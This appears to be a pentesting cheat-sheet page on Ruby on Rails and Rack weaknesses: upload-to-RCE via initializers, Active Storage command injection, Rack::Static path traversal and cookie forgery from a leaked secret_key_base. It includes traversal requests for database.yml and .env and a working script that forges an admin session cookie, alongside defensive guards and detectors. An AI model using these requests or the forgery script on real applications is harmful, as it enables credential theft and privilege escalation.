Ruby-Tricks


Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

File upload to RCE

As explained in this article, uploading a .rb file into sensitive directories such as config/initializers/ can lead to remote code execution (RCE) in Ruby on Rails applications.

Tips:

  • Other boot/eager-load locations that are executed at app start are just as risky when they are writeable (config/initializers/ is the classic one). If you find an arbitrary file upload that lands anywhere under config/ and is later evaluated/required, you can get RCE at boot.
  • Look for dev/staging builds that copy user-controlled files into the container image from which Rails loads them at boot.
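As an added illustration (not code from the original article), a write-destination guard in Ruby that keeps a client-influenced relative name inside the uploads root, outside anything Rails evaluates at boot, and free of evaluable extensions; the /srv/app paths are assumed values for the demo.

```ruby
# Constructed roots for the demo; in a real app derive them from Rails.root.
UPLOAD_ROOT = File.expand_path('/srv/app/public/uploads')
APP_ROOT    = File.expand_path('/srv/app')
# Directories whose files are required/evaluated when the app starts.
BOOT_LOADED_DIRS = %w[config app lib].map { |d| File.join(APP_ROOT, d) }.freeze
# Extensions Rails or its loaders will execute or evaluate.
EVALUABLE_EXT = %w[.rb .erb .yml .yaml .rake].freeze

class UnsafeUploadPath < StandardError; end

# True when +path+ lies strictly below +dir+ (the directory itself does not count).
def under?(path, dir)
  path.start_with?(dir + File::SEPARATOR)
end

# Returns the absolute destination for +relative_name+, or raises UnsafeUploadPath.
def safe_upload_path(relative_name)
  name = relative_name.to_s
  raise UnsafeUploadPath, 'empty name' if name.strip.empty?
  raise UnsafeUploadPath, 'NUL byte in name' if name.include?("\0")
  # File.expand_path would turn a leading "~" into a home directory; treat it as hostile.
  raise UnsafeUploadPath, 'home-relative name' if name.start_with?('~')

  # expand_path resolves "..", "." and absolute paths, so the containment check below
  # sees the real target rather than the string the client sent.
  dest = File.expand_path(name, UPLOAD_ROOT)

  raise UnsafeUploadPath, "escapes upload root: #{dest}" unless under?(dest, UPLOAD_ROOT)
  if BOOT_LOADED_DIRS.any? { |d| under?(dest, d) }
    raise UnsafeUploadPath, "boot-loaded directory: #{dest}"
  end
  if EVALUABLE_EXT.include?(File.extname(dest).downcase)
    raise UnsafeUploadPath, "evaluable extension: #{File.basename(dest)}"
  end
  dest
end

# Convenience predicate for specs or a request-level pre-check.
def rejected_upload?(relative_name)
  safe_upload_path(relative_name)
  false
rescue UnsafeUploadPath
  true
end
```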

Active Storage image transformation → command execution (CVE-2025-24293)

If an application uses Active Storage with image_processing + mini_magick and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection, because some transformation methods were mistakenly allowed by default.

  • A vulnerable pattern looks like:

```erb
<%= image_tag blob.variant(params[:t] => params[:v]) %>
```

where params[:t] and/or params[:v] are attacker-controlled.

  • What to try during testing

  • Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.

  • Fuzz params[:t] and params[:v] for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host.

  • If you only have read-access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.

  • Remediation/detections

  • If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + image_processing + mini_magick and user-controlled transformations, consider it exploitable. Recommend upgrading and enforcing strict allowlists for methods/params and a hardened ImageMagick policy.
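An added example (not the article's or Rails' own code) of the strict allowlist recommended above: a validator that lets only known transformation methods with shape-checked arguments reach blob.variant. The allowlist contents are an assumption; adapt them to the transformations your app actually needs.

```ruby
require 'json'

class UnsafeTransformation < StandardError; end

MAX_DIMENSION = 4096

# [width, height] pairs of positive integers within a sane bound.
def dims?(v)
  v.is_a?(Array) && v.size == 2 &&
    v.all? { |n| n.is_a?(Integer) && n.between?(1, MAX_DIMENSION) }
end

# method name => predicate that must accept the argument. Constructed allowlist:
# anything not listed here (including raw ImageMagick options) is rejected.
ALLOWED_TRANSFORMS = {
  'resize_to_limit' => ->(v) { dims?(v) },
  'resize_to_fill'  => ->(v) { dims?(v) },
  'rotate'          => ->(v) { v.is_a?(Integer) && [90, 180, 270].include?(v) },
  'quality'         => ->(v) { v.is_a?(Integer) && v.between?(1, 100) }
}.freeze

# Takes the parsed client options (e.g. JSON.parse(params[:t])) and returns a new hash
# of symbol keys holding only allowlisted methods with validated arguments, or raises.
def safe_variant_options(raw)
  raise UnsafeTransformation, 'options must be a JSON object' unless raw.is_a?(Hash)
  raw.each_with_object({}) do |(method, arg), out|
    check = ALLOWED_TRANSFORMS[method.to_s]
    raise UnsafeTransformation, "method not allowed: #{method}" unless check
    raise UnsafeTransformation, "bad argument for #{method}: #{arg.inspect}" unless check.call(arg)
    out[method.to_sym] = arg
  end
end
# In a controller: blob.variant(safe_variant_options(JSON.parse(params[:t])))

# Convenience predicate for specs.
def rejected_transformation?(raw)
  safe_variant_options(raw)
  false
rescue UnsafeTransformation
  true
end
```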

Rack::Static LFI / path traversal (CVE-2025-27610)

If the target stack uses Rack middleware directly or via frameworks, versions of rack prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via Rack::Static when :root is unset/misconfigured. Encoded traversal in PATH_INFO can expose files under the process working directory or an unexpected root.

  • Hunt for apps that mount Rack::Static in config.ru or middleware stacks. Try encoded traversals against static paths, for example:

```text
GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env
```

Adjust the prefix to match the configured urls:. If the app responds with file contents, you likely have LFI to anything under the resolved :root.

  • Mitigation: upgrade Rack; ensure :root only points to a directory of public files and is explicitly set.
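Added example, not from the article or from Rack: a detector for encoded traversal in request paths, usable as a request filter or over access logs, run here over constructed access-log lines that include the two requests shown above. The decoding loop also catches double-encoded sequences.

```ruby
require 'cgi'

# Percent-decode repeatedly (capped) so that %252e%252e, a double-encoded "..", is
# seen as traversal too. CGI.unescape leaves malformed sequences alone rather than raising.
def fully_decoded(path, rounds: 3)
  rounds.times do
    decoded = CGI.unescape(path)
    break if decoded == path
    path = decoded
  end
  path
end

# A ".." segment delimited by "/" or "\" (some stacks treat backslash as a separator).
TRAVERSAL_SEGMENT = %r{(?:\A|[/\\])\.\.(?:[/\\]|\z)}

def traversal_attempt?(path_info)
  TRAVERSAL_SEGMENT.match?(fully_decoded(path_info))
end

# Combined Log Format: client ip, timestamp, request line, status, bytes.
LOG_LINE = %r{\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+) HTTP/[\d.]+" (?<status>\d{3})}

# Returns [ip, path, status] for every request whose path contains traversal.
# A 200 on such a request is the signal that the static handler actually served the file.
def traversal_hits(log_lines)
  log_lines.filter_map do |line|
    m = LOG_LINE.match(line) or next
    [m[:ip], m[:path], m[:status].to_i] if traversal_attempt?(m[:path])
  end
end

# Constructed sample log for the demo.
SAMPLE_LOG = <<~LOG.lines(chomp: true)
  10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /assets/application.css HTTP/1.1" 200 5120
  10.0.0.9 - - [10/Mar/2025:12:00:02 +0000] "GET /assets/%2e%2e/%2e%2e/config/database.yml HTTP/1.1" 200 812
  10.0.0.9 - - [10/Mar/2025:12:00:03 +0000] "GET /favicon.ico/..%2f..%2f.env HTTP/1.1" 200 233
  10.0.0.9 - - [10/Mar/2025:12:00:04 +0000] "GET /assets/%252e%252e/%252e%252e/Gemfile HTTP/1.1" 404 0
  10.0.0.7 - - [10/Mar/2025:12:00:05 +0000] "GET /docs/..hidden/readme.txt HTTP/1.1" 200 40
LOG
```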

Forging/decrypting Rails cookies when secret_key_base is leaked

Rails encrypts and signs cookies using keys derived from secret_key_base. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.

Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, the default in current Rails):

```ruby
require 'cgi'
require 'json'
require 'openssl'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'

# Usage: ruby forge.rb <cookie_name> <url_encoded_cookie_value>
secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
cookie_name     = ARGV.fetch(0)               # e.g. _myapp_session
raw_cookie      = CGI.unescape(ARGV.fetch(1))

salt    = 'authenticated encrypted cookie'
cipher  = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)   # 32 bytes for AES-256
# Apps with load_defaults >= 7.0 derive the key with SHA256; older ones use SHA1.
secret  = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000,
                                          hash_digest_class: OpenSSL::Digest::SHA256)
                                     .generate_key(salt, key_len)
enc     = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)

# Since Rails 6 cookies carry a purpose ("cookie.<name>") in their metadata; without it
# decrypt_and_verify returns nil even when the key is right.
purpose = "cookie.#{cookie_name}"
plain = enc.decrypt_and_verify(raw_cookie, purpose: purpose)
abort 'decrypt failed: check key, salt, digest and purpose' if plain.nil?
puts "Decrypted: #{plain.inspect}"

# Modify and re-encrypt (example: escalate role)
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain, purpose: purpose)
puts "Forged cookie: #{CGI.escape(forged)}"
```

Notes:

  • Older apps may use AES-256-CBC with the salts encrypted cookie / signed encrypted cookie, or the JSON/Marshal serializer. Adjust salts, cipher and serializer accordingly.
  • On compromise, or during an assessment, rotate secret_key_base to invalidate all existing cookies.

See also (Ruby/Rails-specific vulns)

References

  • Rails security announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
  • GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
